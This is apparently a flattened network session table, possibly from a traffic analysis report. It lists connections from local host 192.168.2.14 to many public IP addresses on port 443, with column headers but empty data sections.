                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15854192.168.2.145962065.155.131.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15855192.168.2.1450052191.55.211.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15856192.168.2.1456858113.157.42.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15857192.168.2.1456628116.194.13.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15858192.168.2.1454144203.206.86.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15859192.168.2.145176080.199.137.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15860192.168.2.144942862.126.12.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15861192.168.2.1450836185.90.52.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15862192.168.2.145046473.188.14.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15863192.168.2.1455732118.240.120.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15864192.168.2.1437386207.160.155.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15865192.168.2.144878669.241.249.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15866192.168.2.143701847.6.212.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15867192.168.2.14595305.229.156.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15868192.168.2.143561238.79.65.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15869192.168.2.1453980200.220.238.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15870192.168.2.145823438.186.93.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15871192.168.2.143958871.197.144.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15872192.168.2.144263064.208.233.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15873192.168.2.1433816108.104.65.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15874192.168.2.145715896.181.105.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15875192.168.2.145211019.192.44.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15876192.168.2.14378368.188.36.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15877192.168.2.1441962116.228.37.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15878192.168.2.144823693.224.251.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15879192.168.2.143889679.3.73.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15880192.168.2.1443090122.178.96.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15881192.168.2.1437576138.243.218.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15882192.168.2.1438754188.185.192.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15883192.168.2.1451736213.93.63.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15884192.168.2.1440246187.218.19.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15885192.168.2.143354254.62.20.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15886192.168.2.144055658.124.157.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15887192.168.2.1443292167.223.223.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15888192.168.2.144486858.142.15.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15889192.168.2.1452714111.253.174.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15890192.168.2.1439482137.11.161.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15891192.168.2.14468808.84.244.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15892192.168.2.1443468163.8.94.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15893192.168.2.1443598123.80.18.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15894192.168.2.1447226106.211.125.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15895192.168.2.1434464155.162.140.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15896192.168.2.1444818210.180.110.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15897192.168.2.1442262129.115.141.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15898192.168.2.1451432103.117.195.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15899192.168.2.1455190145.227.1.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15900192.168.2.143655085.136.180.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15901192.168.2.1439534193.219.16.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15902192.168.2.145202480.119.102.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15903192.168.2.145114069.242.138.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15904192.168.2.1447482114.224.51.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15905192.168.2.144025485.209.4.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15906192.168.2.1451014203.142.248.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15907192.168.2.1459414168.199.12.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15908192.168.2.1449738160.60.43.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15909192.168.2.1440274101.247.88.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15910192.168.2.144308679.147.224.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15911192.168.2.1447972108.148.76.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15912192.168.2.144657487.96.49.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15913192.168.2.1450006134.34.101.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15914192.168.2.144809677.75.42.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15915192.168.2.1458800167.1.186.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15916192.168.2.1436152202.88.84.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15917192.168.2.1453520150.178.123.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15918192.168.2.145431098.213.185.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15919192.168.2.1446428222.40.162.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15920192.168.2.1432886168.124.255.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15921192.168.2.144046045.41.5.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15922192.168.2.1446446177.132.244.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15923192.168.2.145932435.104.95.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15924192.168.2.1451080194.41.100.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15925192.168.2.1459186202.160.24.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15926192.168.2.144165059.53.54.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15927192.168.2.145747477.255.105.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15928192.168.2.1454716209.35.171.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15929192.168.2.1459912137.24.170.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15930192.168.2.145773690.71.136.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15931192.168.2.1453486142.230.125.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15932192.168.2.143374445.95.110.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15933192.168.2.145341452.81.149.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15934192.168.2.1449948222.145.4.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15935192.168.2.143998293.187.218.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15936192.168.2.1440958150.114.94.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15937192.168.2.1442590116.58.129.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15938192.168.2.1450502176.50.156.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15939192.168.2.145114053.128.245.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15940192.168.2.145379639.39.120.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15941192.168.2.143915243.253.207.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15942192.168.2.146051696.166.129.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15943192.168.2.1445364179.98.105.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15944192.168.2.144743050.89.6.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15945192.168.2.1442036160.5.90.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15946192.168.2.1454198119.97.129.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15947192.168.2.144056685.246.142.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15948192.168.2.144447891.127.59.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15949192.168.2.145479665.10.91.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15950192.168.2.145710445.14.243.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15951192.168.2.145172682.35.20.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15952192.168.2.1449374180.140.237.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15953192.168.2.1446924100.192.239.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15954192.168.2.143664217.23.65.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15955192.168.2.144659019.35.221.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15956192.168.2.143951457.11.25.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15957192.168.2.1458166196.82.169.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15958192.168.2.1445244147.37.247.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15959192.168.2.1438512116.3.180.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15960192.168.2.1437878194.71.152.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15961192.168.2.1438640145.29.130.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15962192.168.2.1455360174.212.216.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15963192.168.2.1452164220.88.60.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15964192.168.2.143943425.164.191.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15965192.168.2.1444060144.191.175.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15966192.168.2.1436532131.235.190.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15967192.168.2.1438302179.60.182.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15968192.168.2.1455300173.95.30.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15969192.168.2.1451124153.249.41.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15970192.168.2.144050875.6.103.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15971192.168.2.143499238.159.93.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15972192.168.2.1453792223.108.92.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15973192.168.2.1455728150.245.241.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15974192.168.2.1459176170.85.179.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15975192.168.2.144650084.0.71.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15976192.168.2.1442704173.194.76.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15977192.168.2.145757632.128.183.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15978192.168.2.1449466201.168.116.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15979192.168.2.1457010144.237.80.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15980192.168.2.144445035.84.85.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15981192.168.2.1459378105.220.84.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15982192.168.2.145397262.154.1.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15983192.168.2.1460142110.135.185.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15984192.168.2.1448832221.247.158.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15985192.168.2.145827251.94.155.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15986192.168.2.145214840.197.105.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15987192.168.2.143766690.183.180.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15988192.168.2.1445340133.153.161.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15989192.168.2.145494486.102.196.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15990192.168.2.1437396110.95.84.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15991192.168.2.1440348207.33.169.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15992192.168.2.1433500130.179.16.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15993192.168.2.1448920130.34.198.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15994192.168.2.1433142209.237.63.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15995192.168.2.1452778112.194.78.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15996192.168.2.1458918122.125.235.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15997192.168.2.145550664.138.198.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15998192.168.2.143364663.224.232.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15999192.168.2.145925286.153.51.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16000192.168.2.1454122106.66.210.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16001192.168.2.145058861.250.213.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16002192.168.2.143968677.206.22.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16003192.168.2.1435170167.147.122.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16004192.168.2.143878491.62.158.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16005192.168.2.1445004167.148.131.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16006192.168.2.144243631.57.92.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16007192.168.2.1442296211.39.122.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16008192.168.2.1458220206.194.99.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16009192.168.2.144440232.230.35.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16010192.168.2.1440934102.112.143.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16011192.168.2.144499468.168.243.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16012192.168.2.145338218.65.136.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16013192.168.2.1457278166.219.123.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16014192.168.2.145259425.191.58.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16015192.168.2.1445760210.25.80.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16016192.168.2.1437068181.252.15.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16017192.168.2.1454770142.148.243.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16018192.168.2.1452328156.42.196.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16019192.168.2.144861220.224.221.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16020192.168.2.1451598221.35.233.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16021192.168.2.144652646.82.124.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16022192.168.2.1453356103.25.52.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16023192.168.2.1434406101.43.174.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16024192.168.2.1457380201.228.218.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16025192.168.2.1453756201.156.44.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16026192.168.2.145063643.131.12.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16027192.168.2.1435682168.203.219.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16028192.168.2.146061286.139.17.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16029192.168.2.14413704.113.198.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16030192.168.2.1438624122.173.22.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16031192.168.2.143683061.62.42.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16032192.168.2.1434332151.236.195.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16033192.168.2.1451256183.82.245.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16034192.168.2.1450184180.164.240.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16035192.168.2.144377099.131.198.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16036192.168.2.143284638.93.38.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16037192.168.2.1440328147.236.180.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16038192.168.2.1434012112.77.28.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16039192.168.2.143417260.157.11.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16040192.168.2.1434882158.190.53.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16041192.168.2.1433802205.38.157.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16042192.168.2.1453054194.25.204.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16043192.168.2.143860020.12.82.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16044192.168.2.1458338210.20.65.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16045192.168.2.1455364116.192.42.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16046192.168.2.1460942107.156.180.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16047192.168.2.1460676189.113.251.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16048192.168.2.1437544171.158.88.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16049192.168.2.1451844220.119.240.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16050192.168.2.1449998152.213.251.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16051192.168.2.1439060207.87.24.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16052192.168.2.144361236.106.32.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16053192.168.2.145454034.139.222.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16054192.168.2.143752258.154.86.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16055192.168.2.1435672107.253.179.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16056192.168.2.1448364206.15.44.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16057192.168.2.1458262181.237.27.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16058192.168.2.1434490140.8.251.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16059192.168.2.146081837.25.89.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16060192.168.2.1456560144.81.167.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16061192.168.2.144510039.69.227.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16062192.168.2.144148219.11.7.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16063192.168.2.1437816101.211.117.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16064192.168.2.145765241.237.20.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16065192.168.2.1456332135.216.146.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
